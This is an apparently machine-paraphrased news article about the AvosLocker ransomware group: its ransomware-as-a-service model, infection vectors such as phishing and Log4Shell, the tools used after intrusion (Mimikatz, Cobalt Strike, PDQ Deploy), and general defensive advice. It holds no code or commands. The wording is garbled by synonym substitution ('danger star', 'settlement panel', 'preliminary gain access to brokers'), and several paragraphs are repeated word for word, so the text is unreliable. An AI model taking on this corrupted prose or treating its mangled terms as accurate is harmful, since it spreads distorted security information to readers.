Avos ransomware threat actor updates its attack arsenal

Must-read security protection.

The Avos ransomware threat actor has actually recently updated its tooling, not just using destructive software application but likewise business products.

Image: Yingyaipumi/Adobe Stock
A new report from Cisco Talos Intelligence Group exposes new tools utilized in Avos ransomware attacks.
Who is Avos?
Avos is a ransomware group active considering that July 2021. The group follows the Ransomware as a Service company model, which means they offer ransomware services to different affiliates (Figure A).
Figure A.
Image: Avos website. AvosLocker services for its affiliates.
AvosLocker currently supports Windows, Linux and ESXi environments and offers automatic highly configurable builds for the AvosLocker malware. In addition, the danger actor provides a control panel for the affiliates, a settlement panel with push and sound notifications, decryption tests, and access to a diverse network of penetration testers, preliminary gain access to brokers and other contacts.
SEE: Password breach: Why pop culture and passwords dont mix (free PDF) (TechRepublic).
Avos likewise offers calling services and DDoS attacks, which implies they offer telephone call to victims to motivate them to perform or pay the ransom DDoS attacks during the settlement to add stress to the scenario.

The Avos team do not allow attacks versus post-Soviet Union nations. A user nicknamed “Avos” has been observed trying to hire penetration testers with experience in Active Directory networks and initial access brokers on a Russian online forum.
A port scanner known as the SoftPerfect Network Scanner was likewise downloaded and utilized. This port scanner is a commercially offered tool, and Avos is known to make frequent use of it. Avos victims who do not pay have their information sold, as specified on the Avos site: “All information is FOR SALE.

AvosLocker has actually already targeted critical facilities in the US, such as financial services, production and federal government centers, according to the FBI. The Avos group do not enable attacks versus post-Soviet Union countries. A user nicknamed “Avos” has actually been observed trying to hire penetration testers with experience in Active Directory networks and preliminary access brokers on a Russian online forum.
In late 2021, the group excused one attack targeted at a U.S. authorities company and supplied a totally free and instant decryption for all the data that had actually been encrypted. An affiliate had actually currently successfully targeted that authorities agency, most likely without recognizing it, so the Avos group chose to offer the decryption to the firm.
AvosLocker infections & & tools.
Spam e-mail campaigns are used as a preliminary infection vector to acquire a foothold in the targeted network prior to releasing the ransomware.
Other techniques may be used for the initial infection. Talos observed a case where the preliminary compromise was done through an ESXi server exposed on the internet over VMWare Horizon Unified Access Gateways (UAG) and vulnerable to the Log4Shell vulnerability.
When inside the jeopardized network, the opponents utilized a number of destructive tools on endpoints. They also used LoLBins (Living-off-the-Land Binaries), which are non-malicious binaries already installed on operating systems, such as the WMI Provider Host (wmiprvse.exe).
Four weeks after the initial compromise, the danger star ran an encoded PowerShell command making use of DownloadString. In the list below days, a number of PowerShell commands were gone to download additional files and tools such as Mimikatz and Cobalt Strike beacons. A port scanner understood as the SoftPerfect Network Scanner was also downloaded and used. This port scanner is a commercially offered tool, and Avos is understood to make regular use of it. The cybercriminals then modified administrative settings on a remote and local host to help transfer to the lateral movement stage of the attack.
Another instance of the port scanner was transferred by means of AnyDesk to another server in the compromised network.
When all reconnaissance and lateral movements have been completed, the assailants utilize a genuine software application release tool called PDQ Deploy to proliferate the ransomware and other tools across the target network.
In the past, Avos attacks have actually also exposed making use of other tools: the PuTTY Secure copy client tool (pscp.exe), Rclone, Advanced IP scanner and WinLister.
At the end of the procedure, victims are revealed a ransom note (Figure B).
Figure B.
Image: Cisco Talos. Ransom note from the AvosLocker ransomware.
Avos victims who do not pay have their information offered, as stated on the Avos site: “All information is FOR SALE. Contact us with your deals. We only sell data to 3rd parties if the owner of said information refuses to pay.”.
How to secure yourself from Avos.
Network division should be executed to decrease the threat of the entire organization being shut down by ransomware. Strong backup policies also need to be in location to avoid losing information in case of a successful attack.
Multi-factor authentication should be released for every single service facing the Internet, specifically VPN access and webmail systems. Gain access to should be set up with the least opportunities.
Antivirus and security solutions need to be deployed in order to find the hazard. Actual time security ought to constantly be allowed. All systems and software need to be as much as date and patched to prevent succumbing to typical vulnerabilities.
Training and awareness need to be done for every employee, especially to identify phishing emails or any social engineering technique that may target the user.
Disclosure: I work for Trend Micro, but the views revealed in this article are mine.


Leave a Comment